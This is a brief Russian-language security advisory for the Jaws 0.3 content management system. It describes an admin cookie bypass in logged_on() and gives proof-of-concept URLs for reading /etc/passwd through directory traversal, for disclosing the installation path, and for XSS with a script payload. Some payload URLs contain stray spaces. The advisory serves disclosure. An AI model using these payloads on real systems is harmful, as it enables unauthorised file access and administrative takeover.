Программа: Jaws 0.3
Несколько уязвимостей обнаружено в Jaws. Удаленный пользователь может получить административный доступ. Удаленный пользователь может просматривать файлы на целевой системе. Удаленный пользователь может также определить инсталляционный путь и выполнить XSS нападение.
1. Удаленный пользователь может получить административный доступ к целевому приложению из за логической ошибки в функции logged_on(). Удаленный пользователь может установить специально обработанное значение Куки к MD5 хешу или нулевому значению, чтобы получить доступ через admin.php сценарий.
2. Просмотр произвольных файлов:
http://127.0.0.1/jaws/index.php?gadget=../../../../ ../../. ./../../../etc/passwd%00&path=/etc
3. Определение инсталляционного пути:
http://127.0.0.1/jaws/index.php?gadget= filebrowser&path=/etc
4. Раскрытие инсталляционного пути:
http://127.0.0.1/jaws/include/config.php
5. XSS:
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget] &action=<b>bold letter</b>
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget] &action=<script>alert('Colombia Rulx!!');</script>
